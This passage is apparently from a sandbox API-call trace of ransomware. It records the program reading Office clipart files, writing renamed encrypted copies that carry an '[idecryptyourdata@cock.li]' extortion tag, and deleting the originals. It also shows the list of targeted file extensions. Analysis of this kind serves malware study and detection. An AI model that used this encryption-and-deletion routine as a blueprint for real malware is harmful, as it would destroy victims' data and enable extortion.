lpOverlapped=0x0) returned 1 [0065.100] WriteFile (in: hFile=0x384, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x830, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x830, lpOverlapped=0x0) returned 1 [0065.101] ReadFile (in: hFile=0x388, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0065.101] WriteFile (in: hFile=0x384, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0065.101] SetEndOfFile (hFile=0x384) returned 1 [0065.101] CloseHandle (hObject=0x384) returned 1 [0065.102] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.102] SetEndOfFile (hFile=0x388) returned 1 [0065.102] CloseHandle (hObject=0x388) returned 1 [0065.103] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01167_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0065.103] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01167_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01167_.wmf")) returned 1 [0065.103] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01167_.WMF") returned 68 [0065.103] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01167_.WMF") returned 68 [0065.103] lstrlenW (lpString=".doc") returned 4 [0065.103] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0065.103] lstrlenW (lpString=".docx") returned 5 [0065.103] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0065.103] lstrlenW (lpString=".pdf") returned 4 [0065.103] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0065.103] lstrlenW (lpString=".xls") returned 4 [0065.103] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0065.104] lstrlenW (lpString=".xlsx") returned 5 [0065.104] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0065.104] lstrlenW (lpString=".ppt") returned 4 [0065.104] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0065.104] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01167_.WMF") returned 68 [0065.104] lstrlenW (lpString=".zip") returned 4 [0065.104] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0065.104] lstrlenW (lpString=".rar") returned 4 [0065.104] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0065.104] lstrlenW (lpString=".bz2") returned 4 [0065.104] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0065.104] lstrlenW (lpString=".7z") returned 3 [0065.104] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0065.104] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01167_.WMF") returned 68 [0065.104] lstrlenW (lpString=".dbf") returned 4 [0065.104] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0065.104] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01167_.WMF") returned 68 [0065.104] lstrlenW (lpString=".1cd") returned 4 [0065.104] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0065.104] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01167_.WMF") returned 68 [0065.104] lstrlenW (lpString=".jpg") returned 4 [0065.104] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0065.104] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.104] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.105] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01169_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01169_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0065.105] GetLastError () returned 0x0 [0065.105] ReadFile (in: hFile=0x388, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x7e4, lpOverlapped=0x0) returned 1 [0065.151] WriteFile (in: hFile=0x384, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x7f0, lpOverlapped=0x0) returned 1 [0065.152] ReadFile (in: hFile=0x388, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0065.152] WriteFile (in: hFile=0x384, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0065.152] SetEndOfFile (hFile=0x384) returned 1 [0065.152] CloseHandle (hObject=0x384) returned 1 [0065.153] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.153] SetEndOfFile (hFile=0x388) returned 1 [0065.154] CloseHandle (hObject=0x388) returned 1 [0065.154] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01169_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0065.155] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01169_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01169_.wmf")) returned 1 [0065.155] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01169_.WMF") returned 68 [0065.155] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01169_.WMF") returned 68 [0065.155] lstrlenW (lpString=".doc") returned 4 [0065.155] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0065.155] lstrlenW (lpString=".docx") returned 5 [0065.155] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0065.156] lstrlenW (lpString=".pdf") returned 4 [0065.156] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0065.156] lstrlenW (lpString=".xls") returned 4 [0065.156] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0065.156] lstrlenW (lpString=".xlsx") returned 5 [0065.156] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0065.156] lstrlenW (lpString=".ppt") returned 4 [0065.156] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0065.156] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01169_.WMF") returned 68 [0065.156] lstrlenW (lpString=".zip") returned 4 [0065.156] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0065.156] lstrlenW (lpString=".rar") returned 4 [0065.156] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0065.156] lstrlenW (lpString=".bz2") returned 4 [0065.156] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0065.156] lstrlenW (lpString=".7z") returned 3 [0065.156] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0065.156] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01169_.WMF") returned 68 [0065.156] lstrlenW (lpString=".dbf") returned 4 [0065.156] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0065.156] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01169_.WMF") returned 68 [0065.156] lstrlenW (lpString=".1cd") returned 4 [0065.156] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0065.157] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01169_.WMF") returned 68 [0065.157] lstrlenW (lpString=".jpg") returned 4 [0065.157] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0065.157] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.157] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.157] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01171_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01171_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0065.157] GetLastError () returned 0x0 [0065.158] ReadFile (in: hFile=0x388, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x804, lpOverlapped=0x0) returned 1 [0065.167] WriteFile (in: hFile=0x384, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x810, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x810, lpOverlapped=0x0) returned 1 [0065.168] ReadFile (in: hFile=0x388, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0065.168] WriteFile (in: hFile=0x384, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0065.168] SetEndOfFile (hFile=0x384) returned 1 [0065.168] CloseHandle (hObject=0x384) returned 1 [0065.169] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.169] SetEndOfFile (hFile=0x388) returned 1 [0065.170] CloseHandle (hObject=0x388) returned 1 [0065.170] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01171_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0065.170] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01171_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01171_.wmf")) returned 1 [0065.171] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01171_.WMF") returned 68 [0065.171] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01171_.WMF") returned 68 [0065.171] lstrlenW (lpString=".doc") returned 4 [0065.171] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0065.171] lstrlenW (lpString=".docx") returned 5 [0065.171] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0065.171] lstrlenW (lpString=".pdf") returned 4 [0065.171] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0065.171] lstrlenW (lpString=".xls") returned 4 [0065.171] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0065.171] lstrlenW (lpString=".xlsx") returned 5 [0065.171] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0065.171] lstrlenW (lpString=".ppt") returned 4 [0065.171] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0065.171] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01171_.WMF") returned 68 [0065.171] lstrlenW (lpString=".zip") returned 4 [0065.171] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0065.171] lstrlenW (lpString=".rar") returned 4 [0065.171] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0065.171] lstrlenW (lpString=".bz2") returned 4 [0065.171] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0065.171] lstrlenW (lpString=".7z") returned 3 [0065.172] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0065.172] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01171_.WMF") returned 68 [0065.172] lstrlenW (lpString=".dbf") returned 4 [0065.172] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0065.172] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01171_.WMF") returned 68 [0065.172] lstrlenW (lpString=".1cd") returned 4 [0065.172] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0065.172] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01171_.WMF") returned 68 [0065.172] lstrlenW (lpString=".jpg") returned 4 [0065.172] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0065.174] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.174] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.174] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01173_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01173_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0065.174] GetLastError () returned 0x0 [0065.174] ReadFile (in: hFile=0x388, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x70c, lpOverlapped=0x0) returned 1 [0065.187] WriteFile (in: hFile=0x384, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x710, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x710, lpOverlapped=0x0) returned 1 [0065.188] ReadFile (in: hFile=0x388, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0065.188] WriteFile (in: hFile=0x384, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0065.188] SetEndOfFile (hFile=0x384) returned 1 [0065.189] CloseHandle (hObject=0x384) returned 1 [0065.189] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.189] SetEndOfFile (hFile=0x388) returned 1 [0065.190] CloseHandle (hObject=0x388) returned 1 [0065.191] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01173_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0065.191] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01173_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01173_.wmf")) returned 1 [0065.191] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01173_.WMF") returned 68 [0065.191] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01173_.WMF") returned 68 [0065.191] lstrlenW (lpString=".doc") returned 4 [0065.191] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0065.191] lstrlenW (lpString=".docx") returned 5 [0065.191] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0065.191] lstrlenW (lpString=".pdf") returned 4 [0065.192] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0065.192] lstrlenW (lpString=".xls") returned 4 [0065.192] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0065.192] lstrlenW (lpString=".xlsx") returned 5 [0065.192] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0065.192] lstrlenW (lpString=".ppt") returned 4 [0065.192] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0065.192] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01173_.WMF") returned 68 [0065.192] lstrlenW (lpString=".zip") returned 4 [0065.192] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0065.192] lstrlenW (lpString=".rar") returned 4 [0065.192] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0065.192] lstrlenW (lpString=".bz2") returned 4 [0065.192] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0065.193] lstrlenW (lpString=".7z") returned 3 [0065.193] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0065.193] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01173_.WMF") returned 68 [0065.193] lstrlenW (lpString=".dbf") returned 4 [0065.193] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0065.193] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01173_.WMF") returned 68 [0065.193] lstrlenW (lpString=".1cd") returned 4 [0065.193] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0065.193] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01173_.WMF") returned 68 [0065.193] lstrlenW (lpString=".jpg") returned 4 [0065.193] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0065.193] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.193] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.193] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01178_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01178_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0065.194] GetLastError () returned 0x0 [0065.194] ReadFile (in: hFile=0x388, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0xed4, lpOverlapped=0x0) returned 1 [0065.203] WriteFile (in: hFile=0x384, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xee0, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xee0, lpOverlapped=0x0) returned 1 [0065.204] ReadFile (in: hFile=0x388, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0065.204] WriteFile (in: hFile=0x384, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0065.204] SetEndOfFile (hFile=0x384) returned 1 [0065.204] CloseHandle (hObject=0x384) returned 1 [0065.205] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.205] SetEndOfFile (hFile=0x388) returned 1 [0065.206] CloseHandle (hObject=0x388) returned 1 [0065.206] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01178_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0065.207] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01178_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01178_.wmf")) returned 1 [0065.207] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01178_.WMF") returned 68 [0065.207] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01178_.WMF") returned 68 [0065.207] lstrlenW (lpString=".doc") returned 4 [0065.207] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0065.207] lstrlenW (lpString=".docx") returned 5 [0065.207] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0065.207] lstrlenW (lpString=".pdf") returned 4 [0065.207] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0065.207] lstrlenW (lpString=".xls") returned 4 [0065.207] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0065.207] lstrlenW (lpString=".xlsx") returned 5 [0065.207] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0065.208] lstrlenW (lpString=".ppt") returned 4 [0065.208] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0065.211] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01178_.WMF") returned 68 [0065.211] lstrlenW (lpString=".zip") returned 4 [0065.211] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0065.211] lstrlenW (lpString=".rar") returned 4 [0065.211] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0065.211] lstrlenW (lpString=".bz2") returned 4 [0065.211] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0065.211] lstrlenW (lpString=".7z") returned 3 [0065.211] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0065.211] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01178_.WMF") returned 68 [0065.211] lstrlenW (lpString=".dbf") returned 4 [0065.211] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0065.211] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01178_.WMF") returned 68 [0065.211] lstrlenW (lpString=".1cd") returned 4 [0065.211] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0065.211] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01178_.WMF") returned 68 [0065.211] lstrlenW (lpString=".jpg") returned 4 [0065.211] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0065.213] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.213] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.213] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01180_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01180_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0065.213] GetLastError () returned 0x0 [0065.213] ReadFile (in: hFile=0x388, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x824, lpOverlapped=0x0) returned 1 [0065.215] WriteFile (in: hFile=0x384, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x830, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x830, lpOverlapped=0x0) returned 1 [0065.586] ReadFile (in: hFile=0x388, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0065.586] WriteFile (in: hFile=0x384, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0065.586] SetEndOfFile (hFile=0x384) returned 1 [0065.587] CloseHandle (hObject=0x384) returned 1 [0065.588] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.588] SetEndOfFile (hFile=0x388) returned 1 [0065.589] CloseHandle (hObject=0x388) returned 1 [0065.597] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01180_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0065.598] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01180_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01180_.wmf")) returned 1 [0065.598] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01180_.WMF") returned 68 [0065.598] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01180_.WMF") returned 68 [0065.598] lstrlenW (lpString=".doc") returned 4 [0065.598] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0065.598] lstrlenW (lpString=".docx") returned 5 [0065.598] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0065.598] lstrlenW (lpString=".pdf") returned 4 [0065.598] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0065.598] lstrlenW (lpString=".xls") returned 4 [0065.598] 